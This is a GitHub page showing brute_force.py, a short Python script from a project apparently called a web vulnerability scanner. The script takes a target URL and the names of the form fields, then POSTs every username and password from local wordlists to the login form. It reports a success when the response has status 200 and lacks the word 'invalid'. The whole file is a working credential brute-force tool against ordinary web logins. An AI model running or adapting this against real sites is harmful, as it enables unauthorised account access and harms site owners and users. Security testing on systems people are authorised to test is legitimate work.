web-vulnerability-scanner/brute_force.py at main · sanjib2006/web-vulnerability-scanner · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests

def brute_force_login(url, username_field, password_field, specific_username=None):
    try:
        if specific_username:
            usernames = [specific_username]
        else:
            with open("wordlist/usernames.txt", "r") as user_file:
                usernames = [line.strip() for line in user_file]

        with open("wordlist/passwords.txt", "r") as pass_file:
            passwords = [line.strip() for line in pass_file]

        for username in usernames:
            print(f"Trying username: {username}")
            password_found = False
            for password in passwords:
                data = {
                    username_field: username,
                    password_field: password
                }
                response = requests.post(url, data=data)
                if response.status_code == 200 and "invalid" not in response.text.lower():
                    print(f"[+] Login successful! Username: {username}, Password: {password}")
                    return
            if not password_found:
                print(f"No password found in passwords.txt for username: {username}")

        print("[-] Brute force attack completed. No valid credentials found.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

def run_brute_force():
    target_url = input("Enter the target URL: ")
    username_box_id = input("Enter the username field ID: ")
    password_box_id = input("Enter the password field ID: ")

    specific_username = input("Enter a specific username to test (leave blank to use usernames.txt(contains few common usernames)): ").strip()

    brute_force_login(target_url, username_box_id, password_box_id, specific_username if specific_username else None)

if __name__ == "__main__":
    run_brute_force()